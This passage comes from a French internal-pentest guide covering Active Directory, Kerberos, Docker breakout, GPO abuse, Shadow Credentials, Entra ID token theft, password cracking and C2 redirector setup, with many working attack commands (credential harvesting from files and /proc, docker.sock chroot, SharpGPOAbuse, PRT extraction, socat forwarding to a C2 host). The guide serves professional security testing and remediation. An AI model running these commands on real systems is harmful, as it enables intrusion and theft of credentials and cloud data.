NTLM (NT LAN Manager) est un protocole d'authentification challenge-response qui date des années 1990. Malgré ses nombreuses faiblesses connues, il reste activé dans tous les environnements Windows car il est nécessaire pour : l'authentification par adresse IP (pas de nom de domaine), les systèmes hors domaine, les authentifications lors du démarrage avant la disponibilité du DC, et de nombreux logiciels legacy. Le flux NTLM en trois étapes (NEGOTIATE → CHALLENGE → AUTHENTICATE) est la base des attaques de relay : l'attaquant reçoit le NEGOTIATE, l'envoie à la cible réelle, retourne le CHALLENGE au client, et retransmet l'AUTHENTICATE valide à la cible.

NTLMv1 est cryptographiquement cassé (challenge 64 bits, chiffrement DES) et crackable en quelques secondes. NTLMv2 améliore significativement la sécurité en incluant un timestamp et un challenge client dans le calcul HMAC-MD5, le rendant résistant au rejeu mais toujours vulnérable au cracking hors-ligne si le mot de passe est faible. La désactivation totale de NTLM est techniquement possible via GPO mais casse invariablement des applications legacy — c'est pourquoi Microsoft préconise désormais une approche progressive d'audit puis de blocage par seuil.

Kerberos : le standard moderne et ses abus

Kerberos est le protocole d'authentification standard des domaines Windows depuis Windows 2000. Son architecture à tickets (TGT, TGS) élimine la transmission du mot de passe sur le réseau, mais crée de nouveaux vecteurs d'attaque : les tickets peuvent être volés, forgés (Golden/Silver Ticket), et les échanges de Service Ticket (TGS-REP) peuvent être craqués hors-ligne (Kerberoasting). Le Ticket Granting Ticket (TGT) est le ticket principal obtenu après authentification au KDC — sa durée de vie est de 10 heures par défaut, et tout service peut demander un Service Ticket (TGS) en présentant un TGT valide.

# Analyse du trafic Kerberos avec Wireshark/tshark
tshark -r capture.pcap -Y 'kerberos' -T fields \
  -e ip.src -e kerberos.msg_type -e kerberos.CNameString \
  -e kerberos.SNameString -e kerberos.etype

# Types Kerberos intéressants :
# 10 = AS-REQ (demande TGT)
# 11 = AS-REP (réponse TGT)
# 12 = TGS-REQ (demande service ticket)
# 13 = TGS-REP (réponse service ticket - crackable si Kerberoasting)
# 14 = AP-REQ (utilisation du service ticket)
# 30 = KRB-ERROR (erreurs, infos sur les comptes inexistants)

# Detection d'AS-REP sans preauth dans le trafic
tshark -r capture.pcap -Y 'kerberos.msg_type == 11 and not kerberos.padata'

49. Techniques post-exploitation sur Linux/Unix

Les serveurs Linux dans un environnement d'entreprise Windows sont des cibles fréquemment négligées mais souvent très bien positionnées dans le réseau. Serveurs web, bases de données, systèmes de monitoring, pipelines CI/CD — un serveur Linux compromis peut ouvrir des accès significatifs vers l'AD via les secrets applicatifs qu'il contient.

Collecte de secrets sur les systèmes Linux

# Fichiers de configuration contenant des credentials
find /etc /var /opt /home -name "*.conf" -o -name "*.cfg" -o -name "*.ini" \
  -o -name "*.xml" -o -name "*.json" -o -name ".env" 2>/dev/null |
  xargs grep -l "password\|passwd\|secret\|token\|key\|credential" 2>/dev/null

# Historique bash/zsh (mots de passe tapés en ligne de commande)
cat /home/*/.bash_history /root/.bash_history 2>/dev/null | grep -E "pass|mysql|psql|ssh|ldap"

# Variables d'environnement (souvent des secrets injectés via Docker/k8s)
env | grep -iE "pass|secret|token|key|api"
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -iE "pass|secret|token"

# SSH private keys
find / -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" 2>/dev/null

# Credentials dans les fichiers Docker Compose
find / -name "docker-compose*.yml" 2>/dev/null | xargs grep -i "password\|passwd" 2>/dev/null

# Tickets Kerberos (si Linux dans le domaine AD)
find /tmp -name "krb5cc_*" 2>/dev/null
ls -la /etc/krb5.keytab 2>/dev/null && klist -kt /etc/krb5.keytab

Container breakout : de Docker vers l'hôte

# Vérification si on est dans un container
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null

# Container privilegié (breakout trivial)
mount | grep overlay
# Si privilegié :
fdisk -l
# Monter le disque hôte
mkdir /tmp/host && mount /dev/sda1 /tmp/host
chroot /tmp/host /bin/bash

# Cap SYS_PTRACE : injections via ptrace
# Cap SYS_ADMIN : namespace manipulation
# Vérification des capabilities dangereuses
capsh --print | grep -E "cap_sys_admin|cap_sys_ptrace|cap_dac_override"

# cgroup v1 breakout (CVE-2022-0492)
# notify_on_release + release_agent

# Docker socket exposure (breakout immédiat)
ls -la /var/run/docker.sock
# Si accessible :
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
À retenir : Un container Docker avec accès au socket Docker (/var/run/docker.sock) est équivalent à un accès root sur l'hôte. Cette configuration est extrêmement courante dans les environnements de développement et les pipelines CI/CD (Jenkins, GitLab Runner). Sa découverte doit systématiquement être documentée comme vulnérabilité critique.

50. Active Directory : audit des GPO et délégations sensibles

Les Group Policy Objects (GPO) sont un vecteur d'attaque souvent négligé en pentest interne. Une GPO malicieuse ou mal configurée peut permettre l'exécution de code sur des milliers de postes simultanément — un impact potentiellement supérieur à la compromission du Domain Admin lui-même. L'analyse des GPO et des délégations associées est donc systématique dans un pentest interne de qualité.

# Énumération de toutes les GPO du domaine
Get-GPO -All | Select-Object DisplayName, GpoStatus, CreationTime, ModificationTime

# Recherche de GPO avec scripts de démarrage/logon (potentiellement dangereux)
Get-GPO -All | ForEach-Object {
  $gpo = $_
  $report = Get-GPOReport -Guid $gpo.Id -ReportType Xml
  if ($report -match "Script") {
    Write-Output "GPO avec scripts: $($gpo.DisplayName)"
  }
}

# Droits de modification sur les GPO (qui peut modifier quelles GPO)
Get-GPO -All | ForEach-Object {
  $perms = Get-GPPermission -Guid $_.Id -All
  $perms | Where-Object {$_.Permission -eq "GpoEditDeleteModifySecurity"} |
    ForEach-Object { Write-Output "GPO '$($_.DisplayName)' modifiable par: $($_.Trustee.Name)" }
}

# GPO Preferences avec mots de passe (cpassword)
Get-ChildItem -Path "\\domain.local\SYSVOL\domain.local\Policies" -Recurse -Filter "*.xml" |
  Select-String "cpassword" | Select-Object Path, LineNumber, Line

Abus des droits GPO pour l'escalade de privilèges

Si un attaquant obtient des droits d'écriture sur une GPO appliquée à des machines à haute valeur (DC, serveurs Tier 0/1), il peut y ajouter un script de démarrage ou une Scheduled Task qui exécute un payload avec SYSTEM. C'est l'une des techniques de mouvement latéral les plus puissantes car elle n'implique pas de connexion directe aux machines cibles — la GPO est appliquée automatiquement par Windows.

# Exploitation des droits GPO avec PowerView
# 1. Identifier les GPO modifiables
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
  Where-Object {$_.ActiveDirectoryRights -match "CreateChild|GenericAll|GenericWrite"} |
  Where-Object {$_.SecurityIdentifier -notmatch "S-1-5-21.*-519|S-1-5-21.*-512|S-1-5-18"}

# 2. Ajouter un utilisateur au groupe local Administrators via GPO
# (avec SharpGPOAbuse)
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker_user --GPOName "Default Domain Policy"

# 3. Forcer l'application de la GPO
# (attendre le délai de rafraîchissement ou déclencher manuellement)
Invoke-GPUpdate -Computer target_pc -Force

51. Analyse des Shadow Credentials et PKINIT

Les Shadow Credentials sont une technique d'attaque découverte en 2021 qui exploite l'attribut msDS-KeyCredentialLink des objets AD. Cet attribut, utilisé par Windows Hello for Business pour le chiffrement asymétrique, peut être manipulé par un attaquant ayant des droits d'écriture sur un compte pour y ajouter une clé publique contrôlée — permettant ensuite une authentification Kerberos PKINIT sans connaître le mot de passe du compte.

# Shadow Credentials avec Certipy
# Prérequis : droits GenericWrite ou WriteProperty sur l'objet cible

# 1. Ajouter une shadow credential sur le compte cible
certipy shadow auto -u user@domain.local -p Password123 \
  -account target_user -dc-ip 192.168.1.10

# Résultat : certificat PFX + hash NT de target_user (via PKINIT + U2U)

# 2. Alternative avec pyWhisker
python3 pywhisker.py -d domain.local -u user -p Password123 \
  --target target_user --action add

# 3. Authentification via le certificat obtenu
certipy auth -pfx target_user.pfx -dc-ip 192.168.1.10

# Shadow Credentials sur un compte machine (utile pour RBCD)
certipy shadow auto -u user@domain.local -p Password123 \
  -account TARGET_MACHINE$ -dc-ip 192.168.1.10
À retenir : Les Shadow Credentials sont une technique particulièrement discrète car elles n'utilisent pas le mot de passe du compte et ne laissent pas de traces dans les logs d'authentification classiques. La seule détection efficace est la surveillance des modifications de l'attribut msDS-KeyCredentialLink (Event ID 5136). Recommandez systématiquement sa surveillance dans vos plans de remédiation.

52. Attaques sur Entra ID (Azure AD) depuis le réseau interne

Avec la généralisation d'Entra ID (ex-Azure Active Directory), les environnements hybrides créent des opportunités d'escalade cloud inédites. Un attaquant ayant compromis un poste Windows joint à un domaine hybride peut accéder aux tokens Entra ID stockés localement et les utiliser pour accéder aux ressources cloud.

# Extraction des tokens Entra ID depuis un poste Windows joint
# Les tokens sont stockés dans le gestionnaire d'identités Windows (WAM)
# et dans les fichiers DPAPI

# AADInternals : extraction des tokens de refresh
Import-Module AADInternals
# Dump des tokens depuis le Web Account Manager
Get-AADIntAccessTokenFromCache -Resource "https://graph.microsoft.com" -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894"

# Extraction depuis les cookies navigateur (Edge/Chrome)
Get-AADIntAccessTokenFromBrowser

# Avec les tokens Entra ID : énumération des ressources cloud
Connect-AzureAD -AadAccessToken $token -AccountId user@company.com
Get-AzureADUser -All $true | Select-Object DisplayName, UserPrincipalName, UserType
Get-AzureADGroup -All $true | Select-Object DisplayName, SecurityEnabled

Pass-the-PRT : abus des Primary Refresh Tokens

Le Primary Refresh Token (PRT) est un jeton d'authentification Entra ID stocké sur les postes Windows joints à Azure AD. Il permet d'obtenir des tokens d'accès pour n'importe quelle application cloud sans ré-authentification. Sa compromission depuis un poste joint donne accès à l'intégralité des ressources cloud de l'utilisateur.

# Extraction du PRT (nécessite admin local)
# Outil : ROADtools, AADInternals

# Extraction avec AADInternals
Import-Module AADInternals
$prt = Get-AADIntUserPRTToken

# Utilisation du PRT pour obtenir un token d'accès
$at = Get-AADIntAccessTokenForMSGraph -PRTToken $prt

# Accès à SharePoint, Teams, Exchange via le token
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me" \
  -Headers @{Authorization = "Bearer $at"}

53. Techniques de déni de service ciblé en réseau interne (à documenter, pas à exécuter)

Cette section documente les techniques de déni de service ciblé qui peuvent être utilisées par des attaquants réels. Les pentesters ne les exécutent jamais sans autorisation explicite dans les RoE — leur documentation vise uniquement à permettre aux équipes défense de détecter les comportements précurseurs.

Les attaques de verrouillage de comptes consistent à provoquer intentionnellement le verrouillage de comptes AD (notamment des comptes de service critiques) en envoyant de fausses authentifications. Si la politique de verrouillage est à 3 tentatives, envoyer 3 mauvaises authentifications simultanées pour un compte de service critique (svc_sql, svc_exchange) peut interrompre des services applicatifs complets. Les groupes ransomware utilisent cette technique pour désorganiser la réponse à incident pendant le chiffrement.

Le KDC spoofing (CVE-2020-17049 — Bronze Bit) permettait à un attaquant de forger des tickets Kerberos avec l'attribut "Forwardable" même pour des comptes protégés. Bien que patché, ses variantes documentées dans la littérature de sécurité illustrent la fragilité inhérente du protocole Kerberos face aux attaques de bas niveau.

54. Pentest des services d'annuaire non-Microsoft

Les environnements mixtes combinant Active Directory avec d'autres annuaires LDAP — OpenLDAP, FreeIPA (Red Hat Identity Management), Oracle Internet Directory — présentent des vecteurs d'attaque spécifiques. La synchronisation d'annuaires entre AD et ces systèmes tiers crée des points de faiblesse potentiels où des credentials communs ou des trusts mal configurés permettent de traverser les frontières d'annuaire.

# Énumération LDAP générique (fonctionne avec tout annuaire LDAP)
ldapsearch -H ldap://192.168.1.50 -x -b "dc=company,dc=com" \
  "(objectClass=*)" | head -100

# Null bind (accès anonyme - souvent configuré par erreur)
ldapsearch -H ldap://192.168.1.50 -x -D "" -b "dc=company,dc=com" "(objectClass=person)" uid

# FreeIPA : exploitation via API REST
curl -k -H "Content-Type: application/json" \
  -d '{"method":"user_find","params":[[]{"all":true}]}' \
  https://ipa.company.com/ipa/json

# OpenLDAP : anonyme disclosure
nmap -p 389,636 --script ldap-search,ldap-rootdse 192.168.1.50

55. Sécurité des protocoles de gestion réseau

Les équipements réseau — commutateurs, routeurs, firewalls — disposent de leurs propres protocoles de gestion qui sont des cibles légitimes en pentest interne. SNMP, Telnet, SSH avec configurations faibles, et interfaces web d'administration HTTP constituent des vecteurs d'accès supplémentaires permettant de cartographier et potentiellement contrôler la topologie réseau.

# SNMP v1/v2 community string enumeration
nmap -sU -p 161 --script snmp-brute,snmp-info,snmp-interfaces 192.168.1.0/24
onesixtyone -c /usr/share/wordlists/metasploit/snmp_default_pass.txt 192.168.1.0/24

# Lecture SNMP avec community "public" (très courant)
snmpwalk -v 2c -c public 192.168.1.1
snmpwalk -v 2c -c public 192.168.1.1 .1.3.6.1.2.1.4.20  # Interfaces réseau

# Brute force SSH sur équipements réseau
nxc ssh 192.168.1.0/24 -u admin -p /usr/share/wordlists/cisco_passwords.txt

# CDP/LLDP : extraction de topologie réseau (nécessite position L2)
# Wireshark filter : cdp or lldp
tshark -i eth0 -Y 'cdp or lldp' -T json | python3 -c "
import json,sys
data = json.load(sys.stdin)
for pkt in data:
  print(pkt.get('_source',{}).get('layers',{}).get('cdp',{}).get('cdp.deviceid',''))"
À retenir : SNMP v1 et v2 transmettent les community strings en clair sur le réseau. La découverte de la community string "private" (accès lecture/écriture) sur un équipement réseau permet dans certains cas de modifier les tables de routage ou d'extraire les configurations complètes incluant les mots de passe enable. Recommandez systématiquement la migration vers SNMPv3 avec authentification.

56. Intelligence sur les vulnérabilités : CVE 2024-2025 en pentest interne

Le paysage des CVE applicables en pentest réseau interne évolue rapidement. En 2024-2025, plusieurs vulnérabilités critiques ont été découvertes dans des composants universellement déployés dans les environnements Windows d'entreprise. Leur exploitation en contexte de pentest interne est documentée ci-dessous.

CVEComposantTypeScore CVSSExploitabilité 2026
CVE-2024-21338Windows KernelLPE (appid.sys)7.8Exploitée par Lazarus Group
CVE-2024-26234Proxy DriverSpoofing6.7BYOVD attack surface
CVE-2024-30088Windows KernelLPE7.0PoC public disponible
CVE-2024-38094SharePointRCE7.2Exploitation active
CVE-2024-43572MMCRCE7.8Zero-day exploité
CVE-2025-21333Hyper-VLPE7.8Exploitation active jan. 2025
CVE-2025-29824CLFS DriverLPE7.8Exploitée par Storm-2460
# Vérification rapide des systèmes non patchés dans le réseau
# Script PowerShell pour inventaire des hotfixes manquants
nxc smb targets.txt -u admin -p Password123 \
  -x "wmic qfe list brief /format:csv" --no-bruteforce

# Nessus/OpenVAS scan ciblé sur les CVE critiques
# (nécessite accès authentifié dans les RoE)

# WinPEAS : détection automatique des vulnérabilités LPE locales
.\winPEASx64.exe quiet windowscreds dotnet

# Watson : détection ciblée des vulnérabilités Windows LPE
.\Watson.exe

57. Reporting avancé : métriques et KPI du pentest interne

Un rapport de pentest interne mature en 2026 ne se limite pas à la liste des vulnérabilités — il quantifie l'exposition et fournit des métriques actionnables permettant au management de prendre des décisions éclairées sur les investissements sécurité.

Métriques clés à inclure dans l'Executive Summary

MétriqueDescriptionValeur type alarmante
Time to Domain AdminDélai depuis premier accès jusqu'à DA< 4 heures
Blast Radius% de systèmes accessibles avec DA100% (by design)
Credential Reuse Rate% de systèmes partageant un mot de passe commun> 30%
SMB Signing Coverage% de systèmes avec SMB Signing requis< 80%
ADCS Vulnerable TemplatesNombre de templates ESC1-ESC15> 0
Kerberoastable AccountsNombre de comptes avec SPN et mot de passe faible> 0 DA
Unpatched Critical CVESystèmes avec CVE CVSS > 9.0 non patchées> 0
LM/NTLMv1 EnabledSystèmes acceptant encore NTLMv1> 0

Matrice de risque résiduel

La matrice de risque résiduel croise la criticité technique (CVSS) avec l'impact business contextualisé (continuité d'activité, atteinte aux données, image) et la difficulté d'exploitation effective (prérequis, complexité, détection). Cette double pondération permet de prioriser les remédiations en fonction de leur impact réel plutôt que de scores techniques abstraits.

# Exemple de calcul de score de risque contextualisé
def calculate_risk_score(cvss_score, business_impact, exploitability, detectability):
    """
    cvss_score: 0-10 (score CVSS v4.0)
    business_impact: 1-5 (1=faible, 5=critique)
    exploitability: 1-5 (1=très difficile, 5=trivial)
    detectability: 1-5 (1=très détectable, 5=invisible)

    Returns: risk_score 0-100, priorité
    """
    technical = cvss_score / 10
    contextual = (business_impact * 0.4 + exploitability * 0.3 + detectability * 0.3) / 5
    risk_score = (technical * 0.6 + contextual * 0.4) * 100

    if risk_score >= 80: priority = "CRITIQUE - Remédiation immédiate (< 48h)"
    elif risk_score >= 60: priority = "ÉLEVÉ - Remédiation sous 2 semaines"
    elif risk_score >= 40: priority = "MOYEN - Remédiation sous 1 mois"
    else: priority = "FAIBLE - Remédiation sous 3 mois"

    return round(risk_score, 1), priority

# Exemple : Kerberoasting sur compte DA
score, prio = calculate_risk_score(cvss_score=8.1, business_impact=5, exploitability=4, detectability=4)
print(f"Kerberoasting DA: {score}/100 — {prio}")
# Output: Kerberoasting DA: 87.3/100 — CRITIQUE - Remédiation immédiate (< 48h)
À retenir : Le scoring CVSS seul est insuffisant pour prioriser les remédiations en contexte d'entreprise. Une CVE CVSS 9.8 sur un serveur de test isolé est moins prioritaire qu'une misconfiguration CVSS 6.0 permettant d'atteindre directement les DC depuis n'importe quel poste du réseau. Contextualisez toujours vos scores avec l'impact business réel.

58. Intégration Purple Team : collaboration offense/défense

Le Purple Team est une approche collaborative où les équipes Red (offense) et Blue (défense) travaillent conjointement plutôt qu'en opposition. En 2026, cette méthodologie gagne en popularité car elle maximise la valeur des exercices offensifs : au lieu de révéler les failles uniquement dans le rapport final, le Red Team exécute les techniques une par une, la Blue Team observe ses alertes (ou leur absence), et des ajustements de détection sont effectués en temps réel.

Protocole Purple Team pour le réseau interne

Un exercice Purple Team type sur un réseau interne se déroule en trois phases itératives. La première phase "Assume Breach" commence avec un accès de niveau utilisateur de domaine — le Red Team exécute les techniques de reconnaissance (BloodHound, PingCastle) pendant que la Blue Team monitore les alertes MDI et les logs SIEM. Chaque technique est documentée avec son timestamp exact pour permettre la corrélation. La deuxième phase exécute les attaques d'escalade (Kerberoasting, ADCS, coercition) avec des pauses entre chaque technique pour permettre à la Blue Team de vérifier sa détection. La troisième phase valide les mesures correctives en rejouant les techniques après implémentation des contre-mesures — cette validation immédiate est ce qui différencie fondamentalement le Purple Team d'un pentest classique.

# Script de logging pour Purple Team : horodater toutes les actions
LOGFILE="/tmp/purple_team_$(date +%Y%m%d_%H%M%S).log"

log_action() {
  echo "[$(date '+%Y-%m-%d %H:%M:%S')] [RED] $1" | tee -a $LOGFILE
}

log_action "DEBUT: Reconnaissance BloodHound - bloodhound-python -c DCOnly"
bloodhound-python -u user@domain.local -p Password123 -d domain.local -ns 192.168.1.10 -c DCOnly --zip
log_action "FIN: BloodHound DCOnly - données collectées"

# Attendre confirmation Blue Team avant de continuer
read -p "Blue Team: alertes détectées? [o/N] " response
log_action "BLUE TEAM RESPONSE: $response"

59. Automatisation et scripting du pentest interne

L'automatisation de certaines phases du pentest interne permet d'augmenter la couverture et de réduire le temps passé sur les vérifications répétitives. En 2026, les frameworks d'automatisation Red Team permettent d'enchaîner des phases entières tout en maintenant un log précis pour le rapport.

#!/usr/bin/env python3
"""
Script de reconnaissance AD automatisée pour pentest interne
Usage: python3 recon_ad.py -u user -p Password123 -d domain.local -dc 192.168.1.10
"""

import subprocess
import argparse
import datetime
import os

def log(msg, level="INFO"):
    timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    print(f"[{timestamp}] [{level}] {msg}")

def run_cmd(cmd, desc=""):
    log(f"Execution: {desc or cmd}")
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout, result.stderr

def main():
    parser = argparse.ArgumentParser(description="Recon AD automatisé")
    parser.add_argument("-u", "--user", required=True)
    parser.add_argument("-p", "--password", required=True)
    parser.add_argument("-d", "--domain", required=True)
    parser.add_argument("-dc", "--dc-ip", required=True)
    args = parser.parse_args()

    log("=== DEBUT RECONNAISSANCE AD ===")

    # Phase 1 : GetUserSPNs (Kerberoastable)
    out, _ = run_cmd(
        f"GetUserSPNs.py {args.domain}/{args.user}:'{args.password}' -dc-ip {args.dc_ip} -request -outputfile /tmp/spn_hashes.txt 2>/dev/null",
        "Kerberoasting enumeration"
    )

    # Phase 2 : GetNPUsers (AS-REP Roasting)
    out, _ = run_cmd(
        f"GetNPUsers.py {args.domain}/{args.user}:'{args.password}' -dc-ip {args.dc_ip} -request -outputfile /tmp/asrep_hashes.txt 2>/dev/null",
        "AS-REP Roasting enumeration"
    )

    # Phase 3 : BloodHound DCOnly
    out, _ = run_cmd(
        f"bloodhound-python -u '{args.user}@{args.domain}' -p '{args.password}' -d {args.domain} -ns {args.dc_ip} -c DCOnly --zip -o /tmp/bloodhound/ 2>/dev/null",
        "BloodHound collection"
    )

    # Phase 4 : Certipy find
    out, _ = run_cmd(
        f"certipy find -u '{args.user}@{args.domain}' -p '{args.password}' -dc-ip {args.dc_ip} -vulnerable -stdout 2>/dev/null",
        "ADCS vulnerability scan"
    )

    log("=== FIN RECONNAISSANCE AD ===")

if __name__ == "__main__":
    main()

60. Ressources complémentaires et veille en sécurité offensive

La sécurité offensive évolue à un rythme soutenu — des techniques découvertes en conférence un mois deviennent des exploits mainstream six mois plus tard. Maintenir ses compétences à jour est une obligation professionnelle pour tout pentester ou Red Teamer. Les ressources suivantes constituent en 2026 les sources de veille incontournables pour le réseau interne et Active Directory.

RessourceTypeSpécialitéFréquence mise à jour
SpecterOps BlogBlog techniqueAD, ADCS, offensif WindowsMensuelle
harmj0y BlogBlog techniqueKerberos, PowerView, ADIrrégulière
MITRE ATT&CKFrameworkTTP exhaustifTrimestrielle
Hacking ArticlesBlogTutoriels techniquesHebdomadaire
0xdf BlogWriteUps HTBTechniques diversesHebdomadaire
ANSSI GuidesGuides officielsHardening, AD, réglementationAnnuelle
Orange CyberdefenseResearchAD, GOAD, Red TeamMensuelle
Impacket GitHubCode sourceImplémentations protocolesContinue

Les conférences incontournables pour la veille technique en sécurité offensive : DEF CON (Las Vegas, août), Black Hat (Las Vegas/Europe/Asia), BlueHat (Microsoft), Botconf (France, décembre), Pass the SALT (Lille, juillet) pour la scène française, et les actes de CanSecWest pour les recherches de pointe sur les protocoles. Les slides et papers de ces conférences sont disponibles gratuitement et contiennent systématiquement des techniques inédites plusieurs mois avant leur intégration dans les outils mainstream.

À retenir : La veille technique n'est pas optionnelle en sécurité offensive — c'est une compétence professionnelle fondamentale. Consacrez a minima 2 heures par semaine à la lecture de blogs spécialisés, de writeups HTB/OSCP, et de papers de conférences. Les groupes Telegram et Discord de la communauté sécurité francophone (CryptIS, LeHack, NoBracket) sont également des sources précieuses de partage de techniques récentes.

61. Analyse des politiques de mots de passe et stratégies de cracking

La politique de mots de passe d'un domaine Active Directory est l'un des indicateurs les plus révélateurs de la maturité sécurité d'une organisation. En pentest interne, l'analyse de cette politique est une étape préalable indispensable au cracking de hashes — elle permet d'optimiser les attaques par dictionnaire et d'estimer le taux de succès probable avant de lancer des campagnes de cracking longues et coûteuses en ressources. En 2026, la plupart des organisations ont adopté des politiques de longueur minimale de 12 caractères, mais la complexité imposée (majuscules, chiffres, caractères spéciaux) génère souvent des patterns prévisibles que les règles hashcat modernes exploitent efficacement.

Les Fine-Grained Password Policies (FGPP), introduites avec Windows Server 2008, permettent d'appliquer des politiques différentes selon les groupes d'utilisateurs. Les comptes de service ont souvent des politiques moins strictes — mots de passe non expirables, longueur minimale réduite — justement parce que leur rotation est complexe à gérer opérationnellement. Ces comptes sont précisément les cibles prioritaires du Kerberoasting, créant une combinaison dévastatrice : policy laxiste + SPN enregistré = credential de service crackable en quelques heures.

À retenir : Les politiques de mot de passe "Password must meet complexity requirements" de Windows imposent : 6 caractères minimum, 3 des 4 types (majuscule, minuscule, chiffre, spécial), pas les 3 premiers caractères du nom d'utilisateur. Cette politique génère des mots de passe comme "Password1!" qui sont dans les dictionnaires des crackers depuis 2010. Recommandez systématiquement une longueur minimale de 16 caractères avec passphrases plutôt que la complexité de caractères.
# Extraction des politiques de mot de passe du domaine
nxc smb dc01.domain.local -u user -p Password123 --pass-pol

# Politique de verrouillage (important pour ne pas bloquer des comptes)
Get-ADDefaultDomainPasswordPolicy | Select-Object LockoutDuration, LockoutObservationWindow, LockoutThreshold, MinPasswordLength, PasswordHistoryCount

# Fine-Grained Password Policies (FGPP)
Get-ADFineGrainedPasswordPolicy -Filter * | Select-Object Name, Precedence, MinPasswordLength, LockoutThreshold, ComplexityEnabled

# Hashcat : stratégie de cracking par étapes
# Étape 1 : Dictionnaire pur (wordlists FR + EN)
hashcat -m 5600 hashes.txt \
  /usr/share/wordlists/rockyou.txt \
  french_words.txt \
  company_specific.txt

# Étape 2 : Règles best64 sur les dictionnaires
hashcat -m 5600 hashes.txt rockyou.txt -r best64.rule

# Étape 3 : Règles Korelogic (patterns d'entreprise)
hashcat -m 5600 hashes.txt rockyou.txt -r Korelogic-password.rule

# Étape 4 : Masks pour patterns prédictibles
# Saison+Année+Spécial (ex: Hiver2024!, Printemps2025@)
hashcat -m 5600 hashes.txt -a 3 "?u?l?l?l?l?l?d?d?d?d?s"
hashcat -m 5600 hashes.txt company_seasons.hcmask

# Étape 5 : Prince attack (combinaisons de mots)
hashcat -m 5600 hashes.txt -a 6 french_words.txt "?d?d?d?s"

Création d'un dictionnaire personnalisé (OSINT + contexte client)

# CeWL : générer un dictionnaire depuis le site web de l'organisation
cewl https://www.company.com -d 3 -m 6 -w company_wordlist.txt --email

# Inclure variantes de nom d'entreprise
cat > company_specific.txt << 'WORDS'
Company2024
Company2025
Company@2024
Company@2025
Welcome123
Welcome@1
Admin123
Admin@123
Changeme1
P@ssw0rd
Passw0rd1
WORDS

# hashcat -a 0 avec plusieurs wordlists combinées
hashcat -m 5600 hashes.txt \
  company_wordlist.txt \
  company_specific.txt \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  -r /usr/share/hashcat/rules/toggles1.rule

62. Infrastructure C2 : mise en place OPSEC

La mise en place d'une infrastructure de Command & Control (C2) robuste et discrète est la fondation de toute opération Red Team de niveau avancé. En 2026, les proxies de redirection (redirectors), les domaines front (domain fronting), et les profils de communication mimant des services légitimes sont des composants essentiels pour survivre à une analyse réseau par le SOC.

Architecture C2 en couches

Une infrastructure C2 professionnelle utilise plusieurs couches d'abstraction pour protéger le serveur de contrôle réel. La couche 1 est le redirecteur : un VPS tiers (AWS, Azure, DigitalOcean) configuré pour transférer le trafic vers le serveur C2 réel. Si le redirecteur est découvert et bloqué, le serveur C2 reste opérationnel. La couche 2 utilise des domaines avec une historique propre et une bonne réputation DNS pour éviter les blocages par catégorie (Palo Alto, Zscaler). La couche 3 applique des profils de communication mimant des services légitimes (OneDrive, Google Drive, Slack API) pour que le trafic C2 soit indiscernable du trafic applicatif normal sur les proxies d'inspection TLS.

# Configuration redirecteur Apache avec mod_rewrite
# Le redirecteur transfère uniquement les requêtes C2 légitimes vers le C2 réel
# Toutes les autres requêtes sont redirigées vers un site innocent

# /etc/apache2/sites-available/redirector.conf
# RewriteEngine On
# RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# RewriteCond %{REQUEST_URI} "^/onedrive/sync/"
# RewriteRule ^(.*)$ https://c2.internal.lab$1 [P,L]
# RewriteRule ^(.*)$ https://www.microsoft.com/ [R=302,L]

# Socat redirecteur simple (pour tests)
socat TCP4-LISTEN:443,fork TCP4:c2_server_ip:443

# Nginx redirecteur avec inspection User-Agent
# location /api/v1/ {
#   if ($http_user_agent !~ "SpecificBeaconUA") {
#     return 302 https://www.google.com;
#   }
#   proxy_pass https://c2_server:8443;
# }
À retenir : En pentest interne, une infrastructure C2 sophistiquée n'est généralement pas nécessaire — les protections réseau sont moins strictes qu'en Red Team externe. Cependant, si l'organisation dispose d'un proxy d'inspection TLS (Zscaler, Palo Alto Prisma), une architecture C2 avec domain fronting ou utilisation de CDN légitimes devient indispensable pour maintenir les communications.

63. Abus des services cloud depuis le réseau interne

Les organisations modernes utilisent de nombreux services cloud auxquels les postes du réseau interne ont accès : Microsoft 365, Google Workspace, AWS, Azure, Salesforce. Ces services deviennent des vecteurs d'attaque une fois qu'un poste interne est compromis — leur trafic est rarement inspecté aussi profondément que le trafic vers Internet générique.

# Découverte des services cloud utilisés depuis le réseau interne
# Analyse du trafic DNS pour identifier les services cloud
tcpdump -i eth0 -n 'udp port 53' -w dns_capture.pcap &
sleep 300 && kill %1
tshark -r dns_capture.pcap -Y 'dns.qry.type == 1' -T fields -e dns.qry.name |
  sort | uniq | grep -E "microsoft|google|amazon|salesforce|okta|azure"

# Depuis un poste compromis : lister les tokens stockés
# Windows Credential Manager
cmdkey /list

# Tokens Azure CLI
cat ~/.azure/accessTokens.json 2>/dev/null || dir %USERPROFILE%\.azure\

# AWS CLI credentials
cat ~/.aws/credentials 2>/dev/null || type %USERPROFILE%\.aws\credentials

# Google Cloud
cat ~/.config/gcloud/credentials.db 2>/dev/null

Abus des permissions Microsoft 365

# Avec un token M365 valide (obtenu via PRT ou theft) :
# Accès aux emails (Exchange Online)
Connect-ExchangeOnline -AccessToken $token
Get-Mailbox -ResultSize Unlimited | Select-Object PrimarySmtpAddress
# Chercher les emails sensibles (sujets avec "mot de passe", "credential", "VPN")
Search-UnifiedAuditLog -StartDate "2026-01-01" -EndDate "2026-05-08" -Operations "MailItemsAccessed"

# SharePoint Online : chercher des fichiers avec credentials
Connect-PnPOnline -Url https://company.sharepoint.com -AccessToken $token
Submit-PnPSearchQuery -Query "password OR credential OR secret" -SelectProperties Path,Title

# Teams : accès aux conversations (informations potentiellement sensibles)
# Via Graph API
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me/chats" \
  -Headers @{Authorization = "Bearer $token"}

64. Techniques avancées de mouvement latéral : DCOM et WMI profond

